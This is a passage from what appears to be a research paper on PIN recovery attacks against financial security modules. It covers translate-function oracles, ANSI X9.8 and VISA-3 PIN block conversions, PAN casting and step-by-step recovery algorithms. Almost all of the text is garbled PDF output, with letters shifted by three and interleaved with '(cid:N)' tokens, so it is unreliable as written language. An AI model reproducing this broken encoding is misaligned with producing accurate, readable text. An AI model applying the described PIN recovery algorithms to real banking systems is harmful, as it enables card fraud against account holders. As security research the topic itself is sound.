(cid:11)(cid:23)(cid:12)(cid:3)ZLOO(cid:3)GLVWLQJXLVK(cid:3)EHWZHHQ(cid:3)^(cid:19)(cid:15)(cid:20)‘(cid:3) +(cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) +DQG(cid:3)^(cid:27)(cid:15)(cid:28)‘(cid:17)(cid:3) +(cid:20)(cid:17)(cid:21)(cid:17) ,I(cid:3)D(cid:3)(cid:143)^(cid:21)(cid:15)(cid:22)(cid:15)(cid:23)(cid:15)(cid:24)(cid:15)(cid:25)(cid:15)(cid:26)‘(cid:15)(cid:3) +D(cid:3)(cid:134) $(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:3)IRU(cid:3)D(cid:3)(cid:143)^(cid:21)(cid:15)(cid:22)‘(cid:15)(cid:3) +D(cid:3)(cid:134) &(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:3)IRU(cid:3)D(cid:3)(cid:143)^(cid:23)(cid:15)(cid:24)‘(cid:15)(cid:3)DQG(cid:3) +D(cid:3)(cid:134) ((cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:3)IRU(cid:3)D(cid:3)(cid:143)^(cid:25)(cid:15)(cid:26)‘(cid:17)(cid:3)(cid:3) ++HQFH(cid:3)WKH(cid:3)TXHULHV(cid:3)K (cid:11)$(cid:12)(cid:15)(cid:3)K (cid:11)&(cid:12)(cid:3)DQG(cid:3)K (cid:11)((cid:12)(cid:3)ZLOO(cid:3)GLVWLQJXLVK(cid:3)EHWZHHQ(cid:3)^(cid:21)(cid:15)(cid:22)‘(cid:15)(cid:3)^(cid:23)(cid:15)(cid:24)‘(cid:3)DQG(cid:3) +(cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) (cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) (cid:11)D(cid:15)(cid:3)(cid:20)(cid:19)(cid:12) +^(cid:25)(cid:15)(cid:26)‘(cid:17) +7KLV(cid:3)DOJRULWKP(cid:3)WDNHV(cid:3)RQO\(cid:3)(cid:22)(cid:3)RSHUDWLRQV(cid:3)WR(cid:3)LGHQWLI\(cid:3)^D(cid:15)(cid:3)D(cid:3)(cid:134) (cid:20)(cid:3)‘(cid:17) +(cid:27) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +(cid:25)(cid:17)(cid:22)(cid:17) ,QVWDQWLDWLQJ(cid:3)WKH(cid:3)2UDFOHV +/HW(cid:3)$(cid:11)O(cid:15)(cid:3)L(cid:15)(cid:3)[(cid:12)(cid:3)EH(cid:3)O(cid:3)KH[DGHFLPDO(cid:3)GLJLWV(cid:3)ORQJ(cid:3)DQG(cid:3)DOO(cid:3)]HUR(cid:10)V(cid:15)(cid:3)H[FHSW(cid:3)IRU(cid:3)WKH(cid:3)LWK GLJLW(cid:3)ZKLFK(cid:3)LV(cid:3)[(cid:3)(cid:11)H(cid:17)J(cid:17)(cid:3)$(cid:11)(cid:20)(cid:21)(cid:15)(cid:3) +(cid:21)(cid:15)(cid:26)(cid:12)(cid:3) (cid:3)(cid:19)(cid:26)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12)(cid:17) +(cid:25)(cid:17)(cid:22)(cid:17)(cid:20)(cid:17)5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOHV(cid:3)K(cid:11)3 (cid:15)(cid:3)(cid:20)(cid:19)(cid:12)(cid:15)(cid:3)O(cid:11)3% (cid:15)(cid:3))(cid:12)(cid:3) +L(cid:14)(cid:21) L(cid:14)(cid:23) +1RWH(cid:29)(cid:3)8VLQJ(cid:3)WKH(cid:3)WUDQVODWH(cid:3)IXQFWLRQ(cid:3)ZLWK(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:17) +&RQVLGHU(cid:3) +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3)3&(cid:11)$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:12)(cid:3)o $16,(cid:3);(cid:28)(cid:17)(cid:27) +3$1 3$1•(cid:3) (cid:3)3$1(cid:3)(cid:134)$(cid:3)(cid:11)(cid:20)(cid:21)(cid:15)(cid:3)L(cid:15)(cid:3)[(cid:12) 3$1 +3%(cid:3) (cid:3) G (cid:11)(3%(cid:12)(cid:3) +(cid:11).(cid:12) +3(cid:20)(cid:10) (cid:3) 3%(cid:3)(cid:134) 3(cid:21)(cid:10) +(cid:3) (cid:11)3(cid:20)(cid:3)(cid:134) 3(cid:21)(cid:12)(cid:3)(cid:134) (cid:11)3(cid:21)(cid:3)(cid:134) $(cid:3)(cid:11)(cid:20)(cid:25)(cid:15)(cid:3)L(cid:14)(cid:23)(cid:15)(cid:3)[(cid:12)(cid:12)(cid:3) +3(cid:20)(cid:3)(cid:134) $(cid:11)(cid:20)(cid:25)(cid:15)(cid:3)L(cid:14)(cid:23)(cid:15)(cid:3)[(cid:12) +3(cid:10)(cid:3) (cid:3) 3(cid:3)(cid:134) $(cid:3)(cid:11)/(cid:15)(cid:3)L(cid:14)(cid:21)(cid:15)(cid:3)[(cid:12) +(3%(cid:10)(cid:3) (cid:3) H (cid:11)3(cid:20)(cid:10)(cid:12)(cid:3) +(cid:11).(cid:12) +7KLV(cid:3)RSHUDWLRQ(cid:3)ZLOO(cid:3)VXFFHHG(cid:3)LI(cid:3)3(cid:20)(cid:10)(cid:3)DQG(cid:3)3(cid:10)(cid:3)DUH(cid:3)GHHPHG(cid:3)YDOLG(cid:17)(cid:3)(cid:3) +,I(cid:3)IRUPDW(cid:3)FKHFNLQJ(cid:3)LV(cid:3)DSSOLHG(cid:3)WR(cid:3)HQVXUH(cid:3)WKDW(cid:3)DOO(cid:3)3,1(cid:3)GLJLWV(cid:3)3(cid:10)(cid:3) (cid:3)3(cid:10)3(cid:10) (cid:17)(cid:17)(cid:17)3(cid:10) DUH(cid:3)YDOLG(cid:3)(cid:11)L(cid:17)H(cid:17)(cid:3)3(cid:10) (cid:31)(cid:3)(cid:20)(cid:19)(cid:12)(cid:15)(cid:3)WKHQ(cid:3) +(cid:20) (cid:21) / L +IRU(cid:3)L(cid:3) (cid:3)(cid:20)(cid:3)(cid:17)(cid:17)(cid:3)(cid:11)/(cid:16)(cid:21)(cid:12)(cid:15)(cid:3)WKH(cid:3)FDOO(cid:3)ZLOO(cid:3)IDLO(cid:3)LI(cid:3)3 (cid:134) [(cid:3)t (cid:20)(cid:19)(cid:17)(cid:3)(cid:3)7KLV(cid:3)\LHOGV(cid:3)WKH(cid:3)RUDFOH(cid:3)K(cid:11)3 (cid:15)(cid:3)(cid:20)(cid:19)(cid:12) IRU(cid:3)L(cid:3) (cid:3)(cid:20)(cid:3)(cid:17)(cid:17)(cid:3)(cid:11)/(cid:16)(cid:21)(cid:12)(cid:4)(cid:3)(cid:3),I(cid:3) +L L(cid:14)(cid:21) +IRUPDW(cid:3)FKHFNLQJ(cid:3)LV(cid:3)DSSOLHG(cid:3)WR(cid:3)HQVXUH(cid:3)WKDW(cid:3)DOO(cid:3)WKH(cid:3)SDGGLQJ(cid:3)GLJLWV(cid:3)LQ(cid:3)3(cid:20)(cid:10) DUH(cid:3)FRUUHFW(cid:15)(cid:3)WKHQ(cid:3)L(cid:3) (cid:3)(cid:11)/(cid:16)(cid:20)(cid:12)(cid:17)(cid:17)(cid:20)(cid:21)(cid:15)(cid:3)WKH(cid:3) +FDOO(cid:3)ZLOO(cid:3)IDLO(cid:17)(cid:3)(cid:3),I(cid:3)ZH(cid:3)VHW(cid:3)[(cid:3) (cid:3)(cid:20)(cid:15)(cid:3)WKHQ(cid:3)IRU(cid:3)L(cid:3) (cid:3)(cid:20)(cid:17)(cid:17)/(cid:16)(cid:21)(cid:15)(cid:3)WKH(cid:3)FDOO(cid:3)PXVW(cid:3)SDVV(cid:3)E\(cid:3)RXU(cid:3)OHPPD(cid:15)(cid:3)ZKLOH(cid:3)IRU(cid:3)L(cid:3) (cid:3)/(cid:16)(cid:20)(cid:17)(cid:17)(cid:20)(cid:21)(cid:15)(cid:3) +WKH(cid:3)FDOO(cid:3)ZLOO(cid:3)IDLO(cid:17)(cid:3)(cid:3)7KLV(cid:3)\LHOGV(cid:3)RUDFOHO(cid:11)3% (cid:15)(cid:3))(cid:12)(cid:17)(cid:3)7KLV(cid:3)OHDGV(cid:3)WR(cid:3)WKH(cid:3)IROORZLQJ(cid:3)3,1(cid:3)UHFRYHU\(cid:3)DWWDFN(cid:17) +L(cid:14)(cid:23) +(cid:25)(cid:17)(cid:23)(cid:17) $16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)3,1(cid:3)/HQJWK(cid:3)’HWHUPLQDWLRQ +$OJRULWKP(cid:29)(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)3,1(cid:3)/HQJWK(cid:3)’HWHUPLQDWLRQ +(cid:20)(cid:17) 6LQFH(cid:3)WKH(cid:3)PLQLPXP(cid:3)YDOXH(cid:3)RI(cid:3)/(cid:3)LV(cid:3)(cid:23)(cid:3)DQG(cid:3)WKH(cid:3)PD[LPXP(cid:3)(cid:20)(cid:21)(cid:15)(cid:3)ZH(cid:3)LWHUDWH(cid:3)L(cid:3) (cid:3)(cid:22)(cid:17)(cid:17)(cid:20)(cid:20) +(cid:20)(cid:17)(cid:20)(cid:17) ,I(cid:3)O(cid:11)3% (cid:15)(cid:3))(cid:12)(cid:3)LV(cid:3)WUXH WKHQ(cid:3)UHWXUQ(cid:3)/(cid:3) (cid:3)L(cid:3)(cid:14)(cid:3)(cid:20)(cid:17) +L(cid:14)(cid:23) +7KH(cid:3)UXQQLQJ(cid:3)WLPH(cid:3)RI(cid:3)WKH(cid:3)DOJRULWKP(cid:3)LV(cid:3)/(cid:16)(cid:22)(cid:17) +(cid:25)(cid:17)(cid:24)(cid:17) $16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)(cid:11)3DUWLDO(cid:12)(cid:3)3,1(cid:3)5HFRYHU\(cid:3)DWWDFN +$OJRULWKP(cid:29)(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)(cid:11)3DUWLDO(cid:12)(cid:3)3,1(cid:3)5HFRYHU\(cid:3)DWWDFN +(cid:20)(cid:17) )RU(cid:3)L(cid:3) (cid:3)(cid:20)(cid:3)(cid:17)(cid:17)(cid:3)/(cid:16)(cid:21) +(cid:20)(cid:17)(cid:20)(cid:17) 8VH(cid:3)WKH(cid:3)HIILFLHQW(cid:3)DOJRULWKP(cid:3)WR(cid:3)GHWHUPLQH(cid:3)3 (cid:15)(cid:3)3 (cid:134) (cid:20)(cid:3)XVLQJ(cid:3)WKH(cid:3)RUDFOH(cid:3)K(cid:11)3 (cid:15)(cid:3)(cid:20)(cid:19)(cid:12)(cid:17) +L(cid:14)(cid:21) L(cid:14)(cid:21) L(cid:14)(cid:21) +7KH(cid:3)UXQQLQJ(cid:3)WLPH(cid:3)RI(cid:3)WKH(cid:3)DOJRULWKP(cid:3)LV(cid:3)(cid:22)(cid:11)/(cid:16)(cid:21)(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)DOJRULWKP(cid:3)GRHV(cid:3)QRW(cid:3)UHFRYHU(cid:3)DQ\(cid:3)LQIRUPDWLRQ(cid:3)DERXW(cid:3)WKH(cid:3) +ILUVW(cid:3)(cid:21)(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:15)(cid:3)EXW(cid:3)LGHQWLILHV(cid:3)WKH(cid:3)UHPDLQLQJ(cid:3)/(cid:16)(cid:21)(cid:3)GLJLWV(cid:3)DV(cid:3)RQH(cid:3)RI(cid:3)(cid:21)(cid:3)FDQGLGDWHV(cid:17)(cid:3)(cid:3),Q(cid:3)WRWDO(cid:15)(cid:3)ZH(cid:3) +KDYH(cid:3)UHGXFHG(cid:3)WKH(cid:3)3,1(cid:3)VSDFH(cid:3)IURP(cid:3)(cid:20)(cid:19)/ WR(cid:3)(cid:20)(cid:19)(cid:21)(cid:3)x (cid:21)/(cid:16)(cid:21)(cid:17)(cid:3) $Q(cid:3)LPSRUWDQW(cid:3)SRLQW(cid:3)LV(cid:3)WKDW(cid:3)WKH(cid:3)DWWDFN(cid:3)RQO\(cid:3)PDNHV(cid:3) +XVH(cid:3)RI(cid:3)WKH(cid:3)3$1(cid:3)&DVWLQJ(cid:3)WHFKQLTXH(cid:17) +(cid:28) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +(cid:25)(cid:17)(cid:25)(cid:17) $16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)(cid:11)([WHQGHG(cid:12)(cid:3)3,1(cid:3)5HFRYHU\(cid:3)DWWDFN +7KHUH(cid:3)LV(cid:3)DQ(cid:3)REYLRXV(cid:3)H[WHQVLRQ(cid:3)WR(cid:3)H[SRVH(cid:3)WKH(cid:3)ILUVW(cid:3)WZR(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)SLQ(cid:17)(cid:3)(cid:3):H(cid:3)VLPSO\(cid:3)H[WHQG(cid:3)WKH(cid:3)3,1(cid:3)E\(cid:3) +(cid:21)(cid:3)GLJLWV(cid:3)WR(cid:3)WKH(cid:3)OHIW(cid:3)XVLQJ(cid:3)WKH(cid:3) +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3))&(cid:11)(cid:3)9,6$(cid:16)(cid:22)(cid:12)(cid:3)o $16,(cid:3);(cid:28)(cid:17)(cid:27) +3$1 (cid:19) 3$1(cid:3) (cid:3)(cid:19) +RSHUDWLRQ(cid:17)(cid:3)(cid:3)7KH(cid:3)RULJLQDO(cid:3)ILUVW(cid:3)(cid:21)(cid:3)GLJLWV(cid:3)33 (cid:15)(cid:3)KDYH(cid:3)EHHQ(cid:3)¶VKLIWHG•(cid:3)WR(cid:3)YXOQHUDEOH(cid:3)SRVLWLRQV(cid:3)LQ(cid:3)WKH(cid:3)QHZ(cid:3)3,1(cid:3)3(cid:10)(cid:3) +(cid:20) (cid:21) +(cid:3)(cid:19)/(cid:10)33 (cid:17)(cid:17)3 ZKHUH(cid:3)/(cid:10)(cid:3) (cid:3)/(cid:14)(cid:21)(cid:17)(cid:3)(cid:3)7KLV(cid:3)DOORZV(cid:3)XV(cid:3)WR(cid:3)UHGXFH(cid:3)WKH(cid:3)SLQ(cid:3)VSDFH(cid:3)WR(cid:3)(cid:21)/(cid:17)(cid:3)(cid:3)7KLV(cid:3)DWWDFN(cid:3)QRZ(cid:3)UHOLHV(cid:3)RQ(cid:3) +(cid:20) (cid:21) / +ERWK(cid:3)WKH(cid:3)3&(cid:3)DQG(cid:3))&(cid:3)WHFKQLTXHV(cid:17)(cid:3)(cid:3)6RPH(cid:3)H[WUD(cid:3)PDQLSXODWLRQ(cid:3)LV(cid:3)UHTXLUHG(cid:3)IRU(cid:3)3,1V(cid:3)RI(cid:3)OHQJWK(cid:3)/(cid:3)t (cid:28)(cid:17) +(cid:25)(cid:17)(cid:26)(cid:17) 3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:3)ZLWKRXW(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ +(cid:25)(cid:17)(cid:26)(cid:17)(cid:20)(cid:17)5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOH(cid:3)O(cid:11)3% (cid:15)(cid:3))(cid:12) +L(cid:14)(cid:23) +8VLQJ(cid:3)WKH(cid:3)WUDQVODWH(cid:3)IXQFWLRQ(cid:3)ZLWKRXW(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:17) +%XW(cid:3)ZKDW(cid:3)LI(cid:3)WKH(cid:3)LPSOHPHQWDWLRQ(cid:3)GRHV(cid:3)QRW(cid:3)HQIRUFH(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ"(cid:3)&RQVLGHU(cid:3)WKH(cid:3)VHTXHQFH +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3)3&(cid:11)(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:12)(cid:3)o9,6$(cid:16)(cid:22)(cid:3) +3$1 3$1(cid:3)(cid:134)$B(cid:11)(cid:20)(cid:21)(cid:15)(cid:3)L(cid:15)(cid:3)(cid:20)(cid:12) +9,6$(cid:16)(cid:22)(cid:3)o $16,(cid:3);(cid:28)(cid:17)(cid:27) +3$1 +:LWKRXW(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:15)(cid:3)WKH(cid:3)ILUVW(cid:3)FDOO(cid:3)ZLOO(cid:3)DOZD\V(cid:3)VXFFHHG(cid:3)\LHOGLQJ(cid:3)3(cid:10)(cid:3) (cid:3)3(cid:3)(cid:134) $(cid:11)/(cid:15)(cid:3)L(cid:14)(cid:21)(cid:15)(cid:3)(cid:20)(cid:12)(cid:3)LI(cid:3)L(cid:3)d /(cid:16)(cid:21)(cid:30)(cid:3) +RWKHUZLVH(cid:3)3(cid:10)(cid:3) (cid:3)3(cid:17)(cid:3)(cid:3)1RWH(cid:3)WKDW(cid:3)UHJDUGOHVV(cid:3)RI(cid:3)WKH(cid:3)YDOXH(cid:3)RI(cid:3)L(cid:15)(cid:3)3(cid:10)(cid:3)LV(cid:3)D(cid:3)YDOLG(cid:3)3,1(cid:3)(cid:11)VLQFH(cid:3)3 (cid:31)(cid:3)(cid:20)(cid:19)(cid:15)(cid:3)E\(cid:3)RXU(cid:3)OHPPD(cid:3) +L(cid:14)(cid:21) +3 (cid:134) (cid:20)(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:12)(cid:17)(cid:3)(cid:3),I(cid:3)L(cid:3)!(cid:3)/(cid:16)(cid:21)(cid:15)(cid:3)WKHQ(cid:3)WKH(cid:3)3,1(cid:3)LV(cid:3)XQFKDQJHG(cid:3)DQG(cid:3)VR(cid:3)WKH(cid:3)ILQDO(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)ZLOO(cid:3)EH(cid:3) +L(cid:14)(cid:21) +LGHQWLFDO(cid:3)WR(cid:3)WKH(cid:3)RULJLQDO(cid:3)RQH(cid:17)(cid:3)(cid:3),I(cid:3)L(cid:3)d /(cid:16)(cid:21)(cid:15)(cid:3)WKHQ(cid:3)WKH(cid:3)ILQDO(cid:3)HQFU\SWHG(cid:3)PXVW(cid:3)GLIIHU(cid:3)VLQFH(cid:3)WKH(cid:3)3(cid:10)(cid:3)z 3(cid:17) 7KXV(cid:3)ZH(cid:3) +REWDLQ(cid:3)DQRWKHU(cid:3)UHDOL]DWLRQ(cid:3)RI(cid:3)O(cid:11)3% (cid:15)(cid:3))(cid:12)(cid:17) +L(cid:14)(cid:23) +(cid:25)(cid:17)(cid:26)(cid:17)(cid:21)(cid:17)5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOH(cid:3)J(cid:11)3 (cid:15)(cid:3))(cid:12) +L(cid:14)(cid:21) +&RQVLGHU(cid:3)WKH(cid:3)VHTXHQFH(cid:15) +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3)3&(cid:11)$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:12)(cid:3)o9,6$(cid:16)(cid:22) +3$1 3$1(cid:3)(cid:134)$(cid:3)(cid:11)(cid:20)(cid:21)(cid:15)(cid:3)L(cid:15)(cid:3)[(cid:12) +9,6$(cid:16)(cid:22)(cid:3)o $16,(cid:3);(cid:28)(cid:17)(cid:27) +3$1(cid:3)(cid:134)$(cid:11)(cid:20)(cid:21)(cid:15)(cid:3)L(cid:15)(cid:3)[(cid:12) +$JDLQ(cid:3)ZH(cid:3)DVVXPH(cid:3)QR(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:15)(cid:3)HQVXULQJ(cid:3)WKH(cid:3)ILUVW(cid:3)FDOO(cid:3)ZLOO(cid:3)DOZD\V(cid:3)VXFFHHG(cid:17)(cid:3)(cid:3))RU(cid:3)VLPSOLFLW\(cid:3)ZH(cid:3) +DVVXPH(cid:3)(cid:21)(cid:3)(cid:31)(cid:3)L(cid:3)d (cid:16)(cid:21)(cid:3)DQG(cid:3)VR(cid:3)3(cid:10)(cid:3) (cid:3)3(cid:3)(cid:134) $(cid:11)/(cid:15)(cid:3)L(cid:14)(cid:21)(cid:15)(cid:3)[(cid:12)(cid:15)(cid:3)3(cid:10) (cid:3)3 (cid:134) [(cid:17)(cid:3)(cid:3),I(cid:3)[(cid:3) (cid:3)3 (cid:134) )(cid:15)(cid:3)WKHQ(cid:3)3(cid:10) (cid:3))(cid:3)ZKLFK(cid:3)LV(cid:3) +L(cid:14)(cid:21) L(cid:14)(cid:21) L(cid:14)(cid:21) L(cid:14)(cid:21) +YLHZHG(cid:3)DV(cid:3)D(cid:3)GHOLPLWHU(cid:3)DQG(cid:3)LV(cid:3)XVHG(cid:3)WR(cid:3)LGHQWLI\(cid:3)WKH(cid:3)HQG(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)IRU(cid:3)WKH(cid:3)9,6$(cid:16)(cid:22)(cid:3)IRUPDW(cid:17)(cid:3)(cid:3)7KLV(cid:3)UHGXFHV(cid:3) +WKH(cid:3)3,1(cid:3)WR(cid:3)OHQJWK(cid:3)/(cid:10)(cid:3) (cid:3)(cid:21)(cid:3)(cid:14)(cid:3)L(cid:17)(cid:3)(cid:3)7KLV(cid:3)FDQ(cid:3)EH(cid:3)LGHQWLILHG(cid:3)HLWKHU(cid:3)E\(cid:3)UHFDOFXODWLQJ(cid:3)WKH(cid:3)3,1(cid:3)OHQJWK(cid:3)RU(cid:3)VLPSO\(cid:3) +UHIRUPDWWLQJ(cid:3) WKH(cid:3) UHVXOW(cid:3) EDFN(cid:3) WR(cid:3) LW(cid:10)V(cid:3) IRUPHU(cid:3) IRUPDW(cid:3) DQG(cid:3) FKHFNLQJ(cid:3) LI(cid:3) WKH(cid:3) IRUPHU(cid:3) DQG(cid:3) UHVXOWDQW(cid:3) +HQFU\SWHG(cid:3)3,1(cid:3)EORFNV(cid:3)DUH(cid:3)LGHQWLFDO(cid:3)(cid:11)LI(cid:3)WKH(cid:3)3,1(cid:3)OHQJWKKDV(cid:3)FKDQJHG(cid:15)(cid:3)WKH\(cid:3)ZLOO(cid:3)GLIIHU(cid:12)(cid:17) +)RU(cid:3)L(cid:3)(cid:31)(cid:3)(cid:21)(cid:3)DQG(cid:3)3(cid:10) (cid:3))(cid:15)(cid:3)WKH(cid:3)LPSOHPHQWDWLRQ(cid:3)VKRXOG(cid:3)IDLO(cid:3)WKH(cid:3)RSHUDWLRQ(cid:3)(cid:11)KHQFH(cid:3)EH(cid:3)HDVLO\(cid:3)LGHQWLILDEOH(cid:12)(cid:3)VLQFH(cid:3) +L(cid:14)(cid:21) +WKH(cid:3)3,1(cid:3)OHQJWK(cid:3)LV(cid:3)OHVV(cid:3)WKDQ(cid:3)WKH(cid:3)PLQLPXP(cid:3)RI(cid:3)(cid:23)(cid:3)(cid:11)KRZHYHU(cid:3)D(cid:3)SDUWLFXODU(cid:3)LPSOHPHQWDWLRQ(cid:3)PD\(cid:3)EHKDYH(cid:3) +GLIIHUHQWO\(cid:12)(cid:17)(cid:3)(cid:3)1RQHWKHOHVV(cid:15)(cid:3)JLYHQ(cid:3)RXU(cid:3)DELOLW\(cid:3)WR(cid:3)H[WHQG(cid:3)WKH(cid:3)3,1(cid:3)OHQJWK(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)RYHUFRPH(cid:3)WKH(cid:3)SRWHQWLDO(cid:3) +REVWDFOH(cid:17)(cid:3)(cid:3),Q(cid:3)WKH(cid:3)HQG(cid:15)(cid:3)ZH(cid:3)KDYH(cid:3)REWDLQHG(cid:3)WKH(cid:3)RUDFOH(cid:3)J(cid:11)3 (cid:15)(cid:3))(cid:12)(cid:17) +L(cid:14)(cid:21) +(cid:20)(cid:19) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +(cid:25)(cid:17)(cid:27)(cid:17) 3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:3)ZLWK(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:11)(cid:21)(cid:12) +(cid:25)(cid:17)(cid:27)(cid:17)(cid:20)(cid:17)5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOH(cid:3)J(cid:11)3 (cid:15)(cid:3))(cid:12) +L(cid:14)(cid:21) +/HW(cid:3)$(cid:13)(cid:11)O(cid:15)(cid:3)L(cid:15)(cid:3)[(cid:12)(cid:3) (cid:3)$(cid:11)O(cid:15)L(cid:15)[(cid:12)(cid:3)(cid:134) $(cid:3)(cid:11)O(cid:15)L(cid:14)(cid:20)(cid:15)3 (cid:134) )(cid:12)(cid:3)(cid:134) (cid:17)(cid:17)(cid:17)(cid:3)(cid:134) $(cid:11)O(cid:15)/(cid:16)(cid:21)(cid:15)3 (cid:134) )(cid:12)(cid:3)IRU(cid:3)L(cid:3)(cid:31)(cid:3)/(cid:15)(cid:3)HOVH(cid:3)$(cid:13)(cid:11)O(cid:15)(cid:3)L(cid:15)(cid:3)[(cid:12)(cid:3) (cid:3)(cid:19)(cid:17) +L(cid:14)(cid:21)(cid:14)(cid:20) / +$16,(cid:3);(cid:28)(cid:17)(cid:27) o$16,(cid:3);(cid:28)(cid:17)(cid:27) +3$1(cid:3) (cid:3)(cid:19) $(cid:13)(cid:11)(cid:20)(cid:21)(cid:15)L(cid:15)[(cid:12) +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3))&(cid:11)9,6$(cid:16)(cid:22)(cid:12)(cid:3)o $1<(cid:3) +$(cid:13)(cid:11)(cid:20)(cid:21)(cid:15)L(cid:15)[(cid:12) +7KH(cid:3)ILUVW(cid:3)FDOO(cid:3)PRGLILHV(cid:3)WKH(cid:3)FOHDU(cid:3)3,1(cid:3)EORFN(cid:3)\LHOGLQJ(cid:3) +3%(cid:10)(cid:3) (cid:3) (cid:19)/3(cid:17)(cid:17)3 3(cid:10) )(cid:17)(cid:17)))(cid:15)(cid:3) +(cid:20) L(cid:14)(cid:20) L(cid:14)(cid:21) +3(cid:10) (cid:3) 3 (cid:134) [(cid:15)(cid:3) +L(cid:14)(cid:21) L(cid:14)(cid:21) +ZKLFK(cid:3)LV(cid:3)WKHQ(cid:3)LQWHUSUHWHG(cid:3)DV(cid:3)D(cid:3)9,6$(cid:16)(cid:22)(cid:3)IRUPDW(cid:3)3,1(cid:3)EORFN(cid:17)(cid:3)(cid:3),Q(cid:3)RUGHU(cid:3)IRU(cid:3)WKH(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:3)WR(cid:3) +SDVV(cid:15)(cid:3)/(cid:3)(cid:31)(cid:3)(cid:20)(cid:19)(cid:3)DQG(cid:3)3(cid:10) PXVW(cid:3)EH(cid:3)YDOLG(cid:17)(cid:3)(cid:3)1RWH(cid:3)WKDW(cid:3)LI(cid:3)[(cid:3) (cid:3)3 (cid:134) )(cid:15)(cid:3)WKHQ(cid:3)3(cid:10) (cid:3)3 (cid:134) [(cid:3) (cid:3))(cid:3)LV(cid:3)YDOLG(cid:17)(cid:3)(cid:3),W(cid:3)DOVR(cid:3)KDV(cid:3) +L(cid:14)(cid:21) L(cid:14)(cid:21) L(cid:14)(cid:21) L(cid:14)(cid:21) +WKH(cid:3)VLGH(cid:3)DIIHFW(cid:3)RI(cid:3)FKDQJLQJ(cid:3)WKH OHQJWK(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)WR(cid:3)RQH(cid:3)OHVV(cid:3)WKDQ(cid:3)LI(cid:3)WKLV(cid:3)ZHUH(cid:3)QRW(cid:3)WKH(cid:3)FDVH(cid:17)(cid:3)7KLV(cid:3) +FKDQJH(cid:3)FDQ(cid:3)HDVLO\(cid:3)EH(cid:3)GHWHFWHG(cid:3)E\(cid:3)RXU(cid:3)HDUOLHU(cid:3)PHWKRGV(cid:17)(cid:3)(cid:3)7KXV(cid:3)ZH(cid:3)REWDLQ(cid:3)DQ(cid:3)RUDFOH(cid:3)IRU(cid:3)J(cid:11)3(cid:15)(cid:3))(cid:12)(cid:17) +L +$OJRULWKP(cid:29)(cid:3)(cid:3)3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:3)ZLWK(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ +(cid:20)(cid:17) )RU(cid:3)L(cid:3) (cid:3)(cid:21)(cid:3)(cid:17)(cid:17)(cid:3)/ +(cid:20)(cid:17)(cid:20)(cid:17) )RU(cid:3)HDFK(cid:3)SRVVLEOH(cid:3)YDOXH(cid:3)M(cid:3) (cid:3)(cid:19)(cid:17)(cid:17)(cid:28) +(cid:20)(cid:17)(cid:20)(cid:17)(cid:20)(cid:17) 6XEPLW(cid:3)M(cid:3)(cid:134) )(cid:3)WR(cid:3)RUDFOH(cid:3)J(cid:3)(cid:11)3(cid:15)(cid:3))(cid:12)(cid:17) +L +(cid:20)(cid:17)(cid:20)(cid:17)(cid:21)(cid:17)3 (cid:3)M(cid:3)LII(cid:3)WKH(cid:3)RUDFOH(cid:3)UHWXUQV(cid:3)WUXH(cid:17) +L +(cid:26)(cid:17) 2WKHU(cid:3)$WWDFNV +7KHVH(cid:3)DUH(cid:3)DWWDFNV(cid:3)DJDLQVW(cid:3)ZHDN(cid:3)DOJRULWKPV(cid:3)RU(cid:3)SRRU(cid:3)LPSOHPHQWDWLRQV(cid:17) +(cid:26)(cid:17)(cid:20)(cid:17) 7KH(cid:3)&KHFN(cid:3)9DOXH(cid:3)$WWDFN(cid:3)$JDLQVW(cid:3)2IIVHWV 